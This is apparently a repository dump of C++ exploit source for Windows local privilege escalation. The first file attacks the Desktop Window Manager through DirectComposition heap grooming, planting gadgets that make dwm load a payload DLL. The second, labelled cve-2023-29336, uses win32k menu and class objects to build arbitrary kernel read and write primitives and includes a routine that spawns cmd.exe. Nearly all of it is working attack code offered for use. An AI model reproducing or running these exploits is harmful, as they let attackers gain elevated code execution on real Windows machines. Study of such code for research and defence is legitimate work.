osinfo.dwBuildNumber; 84 | dwMinorVersion = osinfo.dwMinorVersion; 85 | dwMajorVersion = osinfo.dwMajorVersion; 86 | 87 | return TRUE; 88 | } 89 | 90 | ULONG64 get_fnCopyData_vtbl(UINT32 offset) { 91 | DWORD dwBuildNumber; 92 | DWORD dwMinorVersion; 93 | DWORD dwMajorVersion; 94 | 95 | if (get_version_info(dwBuildNumber, dwMinorVersion, dwMajorVersion) != TRUE) { 96 | return -1; 97 | } 98 | 99 | if (dwMinorVersion != 0 && dwMajorVersion != 0x0A) { 100 | return -1; 101 | } 102 | 103 | PCHAR hUser32 = (PCHAR)GetModuleHandleW(L"User32.dll"); 104 | 105 | if (dwBuildNumber == 0x4A65) { 106 | return (ULONG64)(hUser32 + 0x91070) - offset; // Windows 10 19041 107 | } 108 | 109 | return -1; 110 | } 111 | 112 | 113 | bool setup_dwm_resources_tree(dcomp_channel_t& channel, dcomp_shared_section_t& section, HANDLE hcomp, PUINT32 pSpriteVisual, PUINT32 pSurfaceBrush) { 114 | My_MilRectD boundsRect; 115 | 116 | // assign identifiers fo resources 117 | auto dwSurfaceBrushIndex = channel.nextIndex(); 118 | auto dwPrimitiveGroupLayerClipIndex = channel.nextIndex(); 119 | auto dwSpriteVisualMarshalerIndex = channel.nextIndex(); 120 | auto dwContainerMarshalerIndex = channel.nextIndex(); 121 | auto dwCompositionSurfaceBitmapMarshaler = channel.nextIndex(); 122 | auto dwVisualTargetIndex = channel.nextIndex(); 123 | 124 | channel.openSharedResource( 125 | dwVisualTargetIndex, 126 | (UINT64)hcomp, 127 | 0xc9, 128 | 0 129 | ); 130 | channel.createResource( 131 | DCompResourceSurfaceBrushMarshaler, 132 | dwSurfaceBrushIndex, 133 | 0 134 | ); 135 | channel.createResource( 136 | DCompResourcePrimitiveGroupLayerClipMarshaler, 137 | dwPrimitiveGroupLayerClipIndex, 138 | 0 139 | ); 140 | channel.createResource( 141 | DCompResourceSpriteVisualMarshaler, 142 | dwSpriteVisualMarshalerIndex, 143 | 0 144 | ); 145 | channel.createResource( 146 | DCompResourceVisualMarshaler, 147 | dwContainerMarshalerIndex, 148 | 0 149 | ); 150 | channel.createResource( 151 | DCompResourceCompositionSurfaceBitmapMarshaler, 152 | dwCompositionSurfaceBitmapMarshaler, 153 | 0 154 | ); 155 | auto r = channel.apply(); 156 | if (!r) { 157 | wprintf(L"[+][setup_dwm_resources_tree] failed to create resources status=%08X\n", channel.error()); 158 | return false; 159 | } 160 | 161 | wprintf(L"[+][setup_dwm_resources_tree] Resources : COMMITED \n"); 162 | wprintf(L"[+][setup_dwm_resources_tree] => VisualTarget=%08X\n", dwVisualTargetIndex); 163 | wprintf(L"[+][setup_dwm_resources_tree] => SpriteVisualMarshaler=%08X\n", dwSpriteVisualMarshalerIndex); 164 | wprintf(L"[+][setup_dwm_resources_tree] => PrimitiveGroupLayerClip=%08X\n", dwPrimitiveGroupLayerClipIndex); 165 | wprintf(L"[+][setup_dwm_resources_tree] => SurfaceBrush=%08X\n", dwSurfaceBrushIndex); 166 | wprintf(L"[+][setup_dwm_resources_tree] => VisualMarshaler=%08X\n", dwContainerMarshalerIndex); 167 | wprintf(L"[+][setup_dwm_resources_tree] => SurfaceBitmap=%08X\n", dwCompositionSurfaceBitmapMarshaler); 168 | 169 | /* set container as root element */ 170 | channel.setReferenceProperty( 171 | dwVisualTargetIndex, 172 | VisualTargetRootVisual, 173 | dwContainerMarshalerIndex 174 | ); 175 | channel.addVisualChild( 176 | dwContainerMarshalerIndex, 177 | dwSpriteVisualMarshalerIndex, 178 | 0, 179 | 0 180 | ); 181 | 182 | r = channel.apply(); 183 | if (!r) { 184 | wprintf(L"[+][setup_dwm_resources_tree] failed to create visual target relationship commands status=%08X\n", channel.error()); 185 | return false; 186 | } 187 | wprintf(L"[+][main] VisualTarget Relationship: COMMITED \n"); 188 | 189 | /* setup container */ 190 | channel.setFloatProperty(dwContainerMarshalerIndex, 35, 1.0f); 191 | channel.setFloatProperty(dwContainerMarshalerIndex, 36, 1.0f); 192 | 193 | channel.setFloatProperty(dwContainerMarshalerIndex, 0, 124.0f); // offset.x 194 | channel.setFloatProperty(dwContainerMarshalerIndex, 1, 12.0f); // offset.y 195 | channel.setFloatProperty(dwContainerMarshalerIndex, 2, 0.0f); // offset.z 196 | 197 | r = channel.apply(); 198 | if (!r) { 199 | wprintf(L"[+][setup_dwm_resources_tree] failed to set visual target properties status=%08X\n", channel.error()); 200 | return false; 201 | } 202 | 203 | wprintf(L"[+][setup_dwm_resources_tree] VisualTarget Properties : COMMITED \n"); 204 | 205 | /* setup clip */ 206 | channel.setIntegerProperty( 207 | dwPrimitiveGroupLayerClipIndex, 208 | 4, 209 | 0x4000 210 | ); 211 | channel.setIntegerProperty( 212 | dwPrimitiveGroupLayerClipIndex, 213 | 3, 214 | 0x0000 215 | ); 216 | 217 | // [2] >= *a1 && [3] >= [1]; 218 | boundsRect.left = 15; // [0] 219 | boundsRect.top = 1; // [1] 220 | boundsRect.right = 64; // [2] 221 | boundsRect.bottom = 10; // [3] 222 | 223 | channel.setBufferProperty( 224 | dwPrimitiveGroupLayerClipIndex, 225 | 6, 226 | &boundsRect, 227 | sizeof(My_MilRectD) 228 | ); 229 | channel.setReferenceProperty( 230 | dwPrimitiveGroupLayerClipIndex, 231 | 2, 232 | section.index() 233 | ); 234 | 235 | UINT32 surfacesSources[1] = { (UINT32)dwCompositionSurfaceBitmapMarshaler }; 236 | 237 | channel.setReferenceArrayProperty( 238 | dwPrimitiveGroupLayerClipIndex, 239 | 0, 240 | surfacesSources, 241 | 1 242 | ); 243 | 244 | r = channel.apply(); 245 | if (!r) { 246 | wprintf(L"[+][setup_dwm_resources_tree] failed to process primitive group layer clip commands status=%08X\n", channel.error()); 247 | return false; 248 | } 249 | wprintf(L"[+][setup_dwm_resources_tree] PrimitiveGroupLayerClip : COMMITED \n"); 250 | 251 | /* setup brush */ 252 | 253 | My_MilRectD rect; 254 | rect.left = 15; // [0] 255 | rect.top = 1; // [1] 256 | rect.right = 64; // [2] 257 | rect.bottom = 10; // [3] 258 | 259 | channel.setBufferProperty( 260 | dwSurfaceBrushIndex, 261 | 1, 262 | &rect, 263 | sizeof(My_MilRectD) 264 | ); 265 | channel.setReferenceProperty( 266 | dwSurfaceBrushIndex, 267 | 0, 268 | dwPrimitiveGroupLayerClipIndex 269 | ); 270 | 271 | r = channel.apply(); 272 | if (!r) { 273 | wprintf(L"[+][setup_dwm_resources_tree] failed to process surface brush commands status=%08X\n", channel.error()); 274 | return false; 275 | } 276 | 277 | wprintf(L"[+][setup_dwm_resources_tree] SurfaceBrush : COMMITED \n"); 278 | 279 | /* setup sprite */ 280 | // set size 281 | channel.setFloatProperty(dwSpriteVisualMarshalerIndex, 24, 169.0f); // size.x 282 | channel.setFloatProperty(dwSpriteVisualMarshalerIndex, 25, 169.0f); // size.y 382 283 | // set offset 284 | channel.setFloatProperty(dwSpriteVisualMarshalerIndex, 0, 382.0f); // offset.x 285 | channel.setFloatProperty(dwSpriteVisualMarshalerIndex, 1, 88.0f); // offset.y 286 | channel.setFloatProperty(dwSpriteVisualMarshalerIndex, 2, 0.0f); // offset.z 287 | 288 | r = channel.apply(); 289 | if (!r) { 290 | wprintf(L"[+][setup_dwm_resources_tree] failed to process sprite visual commands status=%08X\n", channel.error()); 291 | return false; 292 | } 293 | 294 | wprintf(L"[+][setup_dwm_resources_tree] SpriteVisual Properties: COMMITED \n"); 295 | 296 | *pSpriteVisual = dwSpriteVisualMarshalerIndex; 297 | *pSurfaceBrush = dwSurfaceBrushIndex; 298 | 299 | return true; 300 | } 301 | 302 | void setup_shared_section_data(LPVOID pSharedSectionData) { 303 | auto lpBatchHeaderPG = (My_CPrimitiveGroupBatchHeader*)pSharedSectionData; 304 | 305 | auto targetLFHSize = 0x6C0; 306 | 307 | // sizeof(CManipulationMarshaler) + sizeof(Gadgets) 308 | // -> sizeof(Gadgets) = sizeof(GadgetsData) + sizeof(HeapEntry) 309 | // -> maximum size of gadgets that we could have is 0x8F 310 | // -> btw we could use negative offset to overcome limitation above 311 | lpBatchHeaderPG->field_10 = targetLFHSize + 0x80 + 0x08; // batches_1 312 | lpBatchHeaderPG->field_C = targetLFHSize + 0x300; // for stability purposes it should not to be allocated in the same LFH bucket 313 | lpBatchHeaderPG->field_0 = 0x01; 314 | 315 | lpBatchHeaderPG->field_1C = -1; 316 | 317 | PCHAR pTriggerData = (PCHAR)(pSharedSectionData) + sizeof(My_CPrimitiveGroupBatchHeader); 318 | memset(pTriggerData, 0x41, lpBatchHeaderPG->field_10); 319 | 320 | // set values to satisfy CPrimitiveGroup::ValidateBatches 321 | // if ( *(_DWORD *)(i + a2) > 3u || *(_DWORD *)(i + a2 + 0xC) > 7u ) 322 | for (int i = 0; i < 12; i++ ) { 323 | *(DWORD*)(pTriggerData + i * 0x90) = 0x0; 324 | *(DWORD*)(pTriggerData + i * 0x90 + 0x0C) = 0x0; 325 | } 326 | 327 | wprintf(L"[+][exploit] setup shared section data : OK\n"); 328 | // setup gadgets 329 | // pBuffer + sizeof(buffer) + sizeof(heapentry) 330 | 331 | CHAR acsPayloadPath [256] = {0}; 332 | // GetCurrentDirectoryA(256, acsPayloadPath); 333 | 334 | strcat(acsPayloadPath, "C:\\dumps\\payload.dll"); 335 | 336 | PCHAR command = acsPayloadPath; 337 | 338 | // because actual object ptr is shifted on 8 we have to add 8 to gadgets data 339 | // v79 = CInteraction::CInteraction(v78, (struct CComposition *)a1); 340 | // ActualObjectPtr = (void **)((char *)v79 + 8); <----- ??? 341 | 342 | PCHAR pGadgetsData = pTriggerData + targetLFHSize + 0x10 + 0x08; 343 | *(PULONG64)(pGadgetsData) = get_fnCopyData_vtbl(0xB0); 344 | *(PULONG32)(pGadgetsData + 0x08) = 1; // number of pointers for FixupCallbackPointers 345 | *(PULONG64)(pGadgetsData + 0x20) = 0; 346 | *(PULONG32)(pGadgetsData + 0x18) = 0x30; 347 | *(PULONG64)(pGadgetsData + 0x68) = (ULONG64)GetProcAddress(LoadLibraryA("kernel32.dll"), "LoadLibraryA"); 348 | 349 | wprintf(L"[+][exploit] LoadLibraryA: %p\n", (PVOID)(*(PULONG64)(pGadgetsData + 0x68))); 350 | 351 | *(PULONG64)(pGadgetsData + 0x28) = 0x38; 352 | *(PULONG64)(pGadgetsData + 0x30) = 0x28; 353 | 354 | strcpy(pGadgetsData + 0x38, command); 355 | 356 | wprintf(L"[+][exploit] setup gadgets : OK\n"); 357 | } 358 | 359 | bool normalize_LFH(dcomp_channel_t& channel, UINT32 resourceType, int count) { 360 | for (int i = 0; i < count; i++) { 361 | int dwIndex = channel.nextIndex(); 362 | 363 | channel.createResource( 364 | resourceType, 365 | dwIndex, 366 | 0 367 | ); 368 | } 369 | 370 | if ( !channel.apply() ) { 371 | return false; 372 | } 373 | return true; 374 | } 375 | 376 | BOOL create_window_class(std::wstring className) { 377 | WNDCLASSEXW wcex; 378 | memset(&wcex, 0, sizeof(WNDCLASSEXW)); 379 | 380 | wcex.cbSize = sizeof(WNDCLASSEX); 381 | 382 | wcex.lpfnWndProc = DefWindowProc; 383 | wcex.lpszClassName = className.c_str(); 384 | wcex.cbClsExtra = 0; 385 | wcex.cbWndExtra = 0; 386 | wcex.hInstance = GetModuleHandleA(NULL); 387 | 388 | if (RegisterClassExW(&wcex) == NULL) { 389 | return FALSE; 390 | } 391 | return TRUE; 392 | } 393 | 394 | BOOL destroy_window_class(std::wstring className) { 395 | return UnregisterClassW(className.c_str(), GetModuleHandle(0)); 396 | }; 397 | 398 | HWND create_window(std::wstring className, std::wstring windowName, DWORD width, DWORD height) { 399 | HWND hwnd = CreateWindowW( 400 | className.c_str(), 401 | windowName.c_str(), 402 | WS_OVERLAPPEDWINDOW, 403 | CW_USEDEFAULT, 404 | 0, 405 | width, 406 | height, 407 | nullptr, 408 | nullptr, 409 | nullptr, 410 | nullptr 411 | ); 412 | 413 | return hwnd; 414 | } 415 | 416 | 417 | UINT32 dwm_pid() { 418 | ponylib::nt::proc_snapshot_t ntsnap; 419 | 420 | if (!NT_SUCCESS( ntsnap.build() ) ) { 421 | return -1; 422 | } 423 | 424 | auto dwm_processes = ntsnap.filter([](auto& proc){ return proc.filename == L"dwm.exe"; }); 425 | if (dwm_processes.size() == 0) { 426 | return -1; 427 | } 428 | 429 | return dwm_processes.back().processId; 430 | } 431 | 432 | bool attempt(int iAttempt, int numberOfLFHAllocations, int numberOfMessagesToPass, int numberOfLFHAllocationsForNormalization, UINT32 dwTypeIdForLFHAllocations) { 433 | bool bAttemptOk = true; 434 | 435 | auto counter = 0; 436 | 437 | auto dwmProcessId = dwm_pid(); 438 | 439 | HWND hwnd = NULL; 440 | HANDLE hcomp = NULL; 441 | 442 | UINT32 dwSpriteVisual; 443 | UINT32 dwSurfaceBrush; 444 | 445 | SIZE_T sizeCh = 0x40000; 446 | 447 | std::shared_ptr ch = nullptr; 448 | std::shared_ptr section = nullptr; 449 | 450 | if ( FALSE == create_window_class(ClassName) ) { 451 | wprintf(L"[+][attempt][%d] failed to create window class. GetLastError(): %08x\n", iAttempt, GetLastError()); 452 | bAttemptOk = false; 453 | goto cleanup; 454 | } 455 | 456 | hwnd = create_window(ClassName, WindowTitle, 900, 672); 457 | if ( NULL == hwnd ) { 458 | wprintf(L"[+][attempt][%d] failed to create window. GetLastError(): %08x\n", iAttempt, GetLastError()); 459 | bAttemptOk = false; 460 | goto cleanup; 461 | } 462 | 463 | ShowWindow(hwnd, 1); 464 | UpdateWindow(hwnd); 465 | 466 | wprintf(L"[+][attempt][%d] hwnd=%p\n", iAttempt, hwnd); 467 | 468 | 469 | auto ntstatus = (*ponylib::win32u::kNtUserCreateDCompositionHwndTarget)( 470 | hwnd, 471 | 1, 472 | &hcomp 473 | ); 474 | if (!NT_SUCCESS(ntstatus)) { 475 | wprintf(L"[+][attempt][%d] failed to create window. status=%08x\n", iAttempt, ntstatus); 476 | bAttemptOk = false; 477 | goto cleanup; 478 | } 479 | 480 | wprintf(L"[+][attempt][%d] hcomp=%p\n", iAttempt, hcomp); 481 | 482 | ch = std::make_shared(sizeCh); 483 | if (!ch->ok()) { 484 | wprintf(L"[+][attempt][%d] failed to create channel. status=%08x\n", iAttempt, ch->error()); 485 | bAttemptOk = false; 486 | goto cleanup; 487 | } 488 | 489 | wprintf(L"[+][attempt][%d] hch=%p\n", iAttempt, ch->hch()); 490 | 491 | section = std::make_shared(ch.get(), ch->nextIndex(), DCompResourceSharedSectionMarshaler, 0x4000); 492 | if (!section->ok()) { 493 | wprintf(L"[+][attempt][%d] failed to create shared section. status=%08x\n", iAttempt, section->error()); 494 | bAttemptOk = false; 495 | goto cleanup; 496 | } 497 | wprintf(L"[+][attempt][%d] SharedSection : OK\n", iAttempt); 498 | wprintf(L"[+][attempt][%d] => SharedSection=%08X\n", iAttempt, section->index()); 499 | wprintf(L"[+][attempt][%d] => hSharedSection=%p\n", iAttempt, section->handle()); 500 | wprintf(L"[+][attempt][%d] => pSharedSection=%p\n", iAttempt, section->base()); 501 | 502 | setup_shared_section_data(section->base()); 503 | 504 | bAttemptOk = setup_dwm_resources_tree( 505 | *ch, 506 | *section, 507 | hcomp, 508 | &dwSpriteVisual, 509 | &dwSurfaceBrush 510 | ); 511 | if (!bAttemptOk) { 512 | wprintf(L"[+][attempt][%d] failed to create resources hierarchy\n", iAttempt); 513 | bAttemptOk = false; 514 | goto cleanup; 515 | } 516 | 517 | wprintf(L"[+][attempt][%d] make allocations in LFH: %d\n", iAttempt, numberOfLFHAllocations); 518 | 519 | int dwTriggerResource[256]; 520 | int iTriggerResource = 0; 521 | 522 | auto normalizationOk = normalize_LFH(*ch, dwTypeIdForLFHAllocations, numberOfLFHAllocationsForNormalization); 523 | if (!normalizationOk) { 524 | wprintf(L"[+][attempt][%d] => LFH normalization failed: %d\n", iAttempt, numberOfLFHAllocationsForNormalization); 525 | bAttemptOk = false; 526 | goto cleanup; 527 | } 528 | 529 | wprintf(L"[+][attempt][%d] => LFH normalization: OK (%d)\n", iAttempt, numberOfLFHAllocationsForNormalization); 530 | 531 | for (int i = 0; i < numberOfLFHAllocations; i++) { 532 | int dwIndex = ch->nextIndex(); 533 | 534 | ch->createResource( 535 | dwTypeIdForLFHAllocations, 536 | dwIndex, 537 | 0 538 | ); 539 | 540 | dwTriggerResource[iTriggerResource++] = dwIndex; 541 | 542 | if (dwmProcessId != dwm_pid()) { 543 | wprintf(L"[+][attempt][%d] dwm crash detected during LFH allocations. Reset.\n", iAttempt ); 544 | bAttemptOk = false; 545 | goto cleanup; 546 | } 547 | 548 | // wprintf(L"[+][attempt][%d] -> LFH Allocated: %d (%d)\n", iAttempt, dwIndex, i ); 549 | } 550 | if ( !ch->apply() ) { 551 | wprintf(L"[+][attempt][%d] failed to create resources in LFH\n status=%08x", iAttempt, ch->error() ); 552 | bAttemptOk = false; 553 | goto cleanup; 554 | } 555 | 556 | wprintf(L"[+][attempt][%d] => LFH bruteforce: OK (%d)\n", iAttempt, numberOfLFHAllocations); 557 | 558 | // trigger vulnerability 559 | ch->setReferenceProperty( 560 | dwSpriteVisual, 561 | 51, 562 | dwSurfaceBrush 563 | ); 564 | if ( !ch->apply() ) { 565 | wprintf(L"[+][attempt][%d] failed to set trigger\n status=%08x", iAttempt, ch->error() ); 566 | bAttemptOk = false; 567 | goto cleanup; 568 | } 569 | 570 | wprintf(L"[+][attempt][%d] Trigger : COMMITED \n", iAttempt); 571 | 572 | for (int i = 0 ; i < numberOfMessagesToPass; i++ ) { 573 | MSG msg; 574 | // Main message loop: 575 | GetMessage(&msg, nullptr, 0, 0); 576 | wprintf(L"[+][attempt][%d]: wparam=%p lparam=%p msg=%d\n", iAttempt, (LPVOID)msg.wParam, (LPVOID)msg.lParam, msg.message); 577 | if (!TranslateAccelerator(msg.hwnd, NULL, &msg)) 578 | { 579 | TranslateMessage(&msg); 580 | DispatchMessage(&msg); 581 | } 582 | } 583 | 584 | Sleep(5000); 585 | 586 | ch->apply(); 587 | ch->apply(); 588 | ch->apply(); 589 | ch->apply(); 590 | ch->apply(); 591 | ch->apply(); 592 | ch->apply(); 593 | ch->apply(); 594 | ch->apply(); 595 | ch->apply(); 596 | 597 | for (int i = 0; i < iTriggerResource; i++) { 598 | auto dwIndex = dwTriggerResource[i]; 599 | wprintf(L"[+][attempt][%d] -> LFH Release: %d (%d)\n", iAttempt, dwIndex, i ); 600 | 601 | ch->releaseResource(dwIndex); 602 | } 603 | if ( !ch->apply() ) { 604 | wprintf(L"[+][attempt][%d] failed to release resources in LFH\n status=%08x", iAttempt, ch->error() ); 605 | bAttemptOk = false; 606 | goto cleanup; 607 | } 608 | 609 | Sleep(5000); 610 | 611 | HANDLE hFile = CreateFileA("C:\\dumps\\pwned.txt", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 612 | if (hFile != INVALID_HANDLE_VALUE) { 613 | wprintf(L"[+][attempt][%d] exploitation completed. Bye!\n", iAttempt); 614 | bAttemptOk = true; 615 | goto cleanup; 616 | } 617 | 618 | bAttemptOk = false; 619 | 620 | wprintf(L"[+][attempt][%d] exploitation failed. Let's try again!\n", iAttempt); 621 | 622 | cleanup: 623 | if (section){ 624 | section.reset(); 625 | } 626 | 627 | if (ch) { 628 | ch.reset(); 629 | } 630 | if (hcomp) { 631 | (*ponylib::win32u::kNtUserDestroyDCompositionHwndTarget)( 632 | hwnd, 633 | hcomp 634 | ); 635 | } 636 | if (hwnd) { 637 | DestroyWindow(hwnd); 638 | } 639 | destroy_window_class(ClassName); 640 | 641 | return bAttemptOk; 642 | } 643 | 644 | bool exploit() { 645 | auto bExploitOk = true; 646 | auto iAttempt = 0; 647 | 648 | auto prevDwmProcessId = 0; 649 | auto numberOfLFHAllocations = 33; 650 | auto defaultNumberOfLFHAllocations = numberOfLFHAllocations; 651 | auto defaultNumberOfLFHAllocationsForNormalization = 0x1000; 652 | 653 | while(true) { 654 | auto dwmProcessId = dwm_pid(); 655 | wprintf(L"[+][attempt][%d] dwmProcId=%d LFHAllocations=%d\n", iAttempt, dwmProcessId, numberOfLFHAllocations); 656 | 657 | if (attempt(iAttempt, numberOfLFHAllocations, 3, defaultNumberOfLFHAllocationsForNormalization, DCompResourceCInteractionMarshaler)) { 658 | break; 659 | } 660 | 661 | if (prevDwmProcessId == 0) { 662 | prevDwmProcessId = dwmProcessId; 663 | } 664 | 665 | numberOfLFHAllocations += 1; 666 | 667 | // if (prevDwmProcessId != dwmProcessId) { 668 | // wprintf(L"[+][attempt][%d] reset number of allocations to default value because dwm crashed\n", iAttempt); 669 | // numberOfLFHAllocations = defaultNumberOfLFHAllocations; 670 | // } 671 | 672 | iAttempt++; 673 | } 674 | 675 | return bExploitOk; 676 | }; 677 | 678 | 679 | int 680 | __cdecl 681 | wmain( 682 | int argc, 683 | __in_ecount(argc) wchar_t* argv[]) 684 | { 685 | 686 | INIT(); 687 | 688 | UINT32 return_code = 0; 689 | 690 | wprintf(L"[?][main] PID=%x\n", GetCurrentProcessId()); 691 | wprintf(L"[?][main] TID=%x\n", GetCurrentThreadId()); 692 | 693 | exploit(); 694 | } -------------------------------------------------------------------------------- /cve-2023-29336/main.cpp: -------------------------------------------------------------------------------- 1 | #ifndef UNICODE 2 | #define UNICODE 3 | #endif 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #define WM_NCUAHDRAWCAPTION 0x00AE 10 | 11 | #define CMIALIGN(x,n) (size_t)((~(n-1))&((x)+(n-1))) 12 | #define SHIFT(x, n) ((PBYTE)(x) + n) 13 | 14 | /** 15 | * Removed 16 | */ 17 | 18 | typedef PTHRDESKHEAD(NTAPI *ty_pfnHMValidateHandle)(PVOID h, int type); 19 | 20 | ty_pfnHMValidateHandle find_HMValidateHandle() { 21 | HMODULE hUser32 = LoadLibrary(L"User32.dll"); 22 | if (NULL == hUser32) { 23 | wprintf(L"user32 not found\n"); 24 | return NULL; 25 | } 26 | PBYTE pbIsMenu = (PBYTE)GetProcAddress(hUser32, "IsMenu"); 27 | if (NULL == pbIsMenu) { 28 | wprintf(L"IsMenu() not found\n"); 29 | return NULL; 30 | } 31 | 32 | ty_pfnHMValidateHandle pfnHMValidateHandle = NULL; 33 | for(PBYTE i = pbIsMenu; i < (pbIsMenu + 0x1000); i++) { 34 | if (*i == 0xe8) { 35 | pfnHMValidateHandle = (ty_pfnHMValidateHandle)(i + 5 + (int)(*(DWORD*)(i + 1))); 36 | break; 37 | } 38 | } 39 | 40 | return pfnHMValidateHandle; 41 | }; 42 | 43 | /** 44 | * 45 | * Global Vars 46 | */ 47 | 48 | const UINT g_wID = 0xF010; 49 | const SIZE_T g_szWindow = 0x168; 50 | const SIZE_T g_szFiller = 0x248; 51 | const SIZE_T g_szCls = 0x1a0; 52 | 53 | const wchar_t g_fmt[] = L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@%04d"; 54 | 55 | const SIZE_T g_cntWindowArrFill = 0x150; 56 | const SIZE_T g_cntMenuArrFill = 0x250; 57 | 58 | HWND g_hWindowArrFill[g_cntWindowArrFill] = {NULL}; 59 | HMENU g_hMenuArrFill[g_cntMenuArrFill] = {NULL}; 60 | PVOID g_kpPopupMenu_A = NULL; 61 | HMENU g_hPopupMenu_A = NULL; 62 | HMENU g_hMenu_Top = NULL; 63 | 64 | ty_pfnHMValidateHandle g_pfnHMValidateHandle = nullptr; 65 | ExploitState g_exploitState; 66 | BYTE g_spwndParent[0x200] = {0}; 67 | BYTE g_spmenu[0x100] = {0}; 68 | BYTE g_cls[0x1000] = {0}; 69 | 70 | int system() 71 | { 72 | SECURITY_ATTRIBUTES sa; 73 | HANDLE hRead, hWrite; 74 | byte buf[40960] = { 0 }; 75 | STARTUPINFOW si; 76 | PROCESS_INFORMATION pi; 77 | DWORD bytesRead; 78 | RtlSecureZeroMemory(&si, sizeof(si)); 79 | RtlSecureZeroMemory(&pi, sizeof(pi)); 80 | RtlSecureZeroMemory(&sa, sizeof(sa)); 81 | int br = 0; 82 | sa.nLength = sizeof(SECURITY_ATTRIBUTES); 83 | sa.lpSecurityDescriptor = NULL; 84 | sa.bInheritHandle = TRUE; 85 | if (!CreatePipe(&hRead, &hWrite, &sa, 0)) 86 | { 87 | printf("[!][system] CreatePipe(): Failed with %llx\n", GetLastError()); 88 | return -3; 89 | } 90 | 91 | si.cb = sizeof(STARTUPINFO); 92 | GetStartupInfoW(&si); 93 | si.hStdError = hWrite; 94 | si.hStdOutput = hWrite; 95 | si.lpDesktop = L"WinSta0\\Default"; 96 | wchar_t cmd[4096] = { L"cmd.exe" }; 97 | 98 | if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) 99 | { 100 | CloseHandle(hWrite); 101 | CloseHandle(hRead); 102 | printf("[!][system] CreateProcessW(): Failed with %llx\n", GetLastError()); 103 | return -2; 104 | } 105 | CloseHandle(hWrite); 106 | 107 | } 108 | 109 | PVOID Read64(PVOID address) { 110 | MENUBARINFO mbi = { 0 }; 111 | mbi.cbSize = sizeof(MENUBARINFO); 112 | ptr_My_tagMENU spmenu = (ptr_My_tagMENU)g_spmenu; 113 | 114 | spmenu->cItems = 1; 115 | spmenu->cAllocated = 1; 116 | spmenu->cxMenu = 1; 117 | spmenu->cyMenu = 1; 118 | spmenu->rgItems = SHIFT(address, -0x40); // sizeof tagMenuItem for tested version of OS Windows is 0x90 119 | // formulas inside win32kful!xxxGetMenuBarInfo are folowing 120 | // mov ecx, dword ptr [r8+rdx*8-50h] 121 | // add ecx, dword ptr [r8+rdx*8-48h] 122 | // where r8 is our address 123 | // and rdx*8 it is total offset from begin of rgItems to requested menu item 124 | // that means the low dword part will be read from 0x40 and high part from 0x48 125 | 126 | GetMenuBarInfo(g_exploitState.hRightGuard, OBJID_MENU, 1, &mbi); 127 | 128 | return PVOID((unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32)); 129 | }; 130 | 131 | PVOID Write64(PVOID address, ULONG64 value, bool& fStatus) { 132 | ptr_My_tagCLS pcls = (ptr_My_tagCLS)g_cls; 133 | 134 | fStatus = false; 135 | 136 | pcls->cbclsExtra = 0xFFFFFFFF; 137 | pcls->pclsBase = (PVOID)&g_cls[0]; 138 | pcls->pclsClone = SHIFT(address, -0xA0); 139 | 140 | int n = 8; 141 | int o = 0; 142 | PVOID pnext = Read64(pcls->pclsClone); 143 | while(pnext != 0 && n > 0 ) { 144 | o += 8; 145 | pcls->pclsClone = SHIFT(pcls->pclsClone, -8); 146 | pnext = Read64(pcls->pclsClone); 147 | n--; 148 | } 149 | 150 | if (n == 0){ 151 | fStatus = false; 152 | return NULL; 153 | } 154 | 155 | ULONG_PTR origcls = SetClassLongPtr(g_exploitState.hwndm, 0x248, (LONG_PTR)&g_cls[0]); 156 | ULONG_PTR prev = SetClassLongPtr(g_exploitState.hRightGuard, o, value); 157 | SetClassLongPtr(g_exploitState.hwndm, 0x248, origcls); 158 | 159 | fStatus = true; 160 | return (PVOID)prev; 161 | } 162 | 163 | void prepareHeap() { 164 | /** 165 | * We would like to build some "fence" in heap which will consist of 166 | * tagCLS. Each free tagCLS is a seat for allocated target tagMENU. 167 | * 168 | * (folowing ASCII depict desired memory layout) 169 | * |------|-------------------------|------| 170 | * |tagCLS|seat for tagMENU (victim)|tagCLS| 171 | * |------|-------------------------|------| 172 | * 0 1 2 173 | * number of tagCLS deduced from practice 174 | * 175 | * odd indices of tagCLS is the seat 176 | * even indices of tagCLS is the fence 177 | * 178 | * order is important becuse we dont want to triger coalesce process in RtlpFree 179 | * 180 | * size of tagCLS with cbClsExtra == 0 is 0xA0 bytes. Size of tagMENU is 0x98 but it will be aligned by RtlpAllocateHeap 181 | * to 16 bound. That means tagMENU allocation size is 0xA0 bytes. 182 | * 183 | */ 184 | const wchar_t g_fmt[] = L"@%d"; 185 | for (int i = 0 ; i < 32; i++) { 186 | WCHAR szTemp[0x100] = { 0 }; 187 | wsprintf(szTemp, g_fmt, i); 188 | 189 | WNDCLASSEX wc = { 0 }; 190 | wc.cbClsExtra = 0x0; 191 | wc.lpszClassName = szTemp; 192 | wc.cbSize = sizeof(WNDCLASSEXA); 193 | wc.lpfnWndProc = DefWindowProcW; 194 | wc.lpszMenuName = NULL; 195 | wc.hInstance = GetModuleHandleA(NULL); 196 | 197 | RegisterClassExW(&wc); 198 | } 199 | 200 | for (int i = 0 ; i < 32; i++) { 201 | WCHAR szTemp[0x100] = { 0 }; 202 | wsprintf(szTemp, g_fmt, i); 203 | if (i % 2) 204 | UnregisterClassW(szTemp, GetModuleHandleA(NULL)); 205 | } 206 | } 207 | 208 | void reallocMenu() { 209 | for (int i = 0; i < 32; i++) { 210 | WCHAR szTemp[0x100] = { 0 }; 211 | wsprintf(szTemp, g_fmt, i); 212 | 213 | /** 214 | * What strings are we going to generate here ? 215 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0000 (wnd => 0x303030) 216 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0001 (wnd => 0x313030) 217 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0011 (wnd => 0x313130) 218 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0012 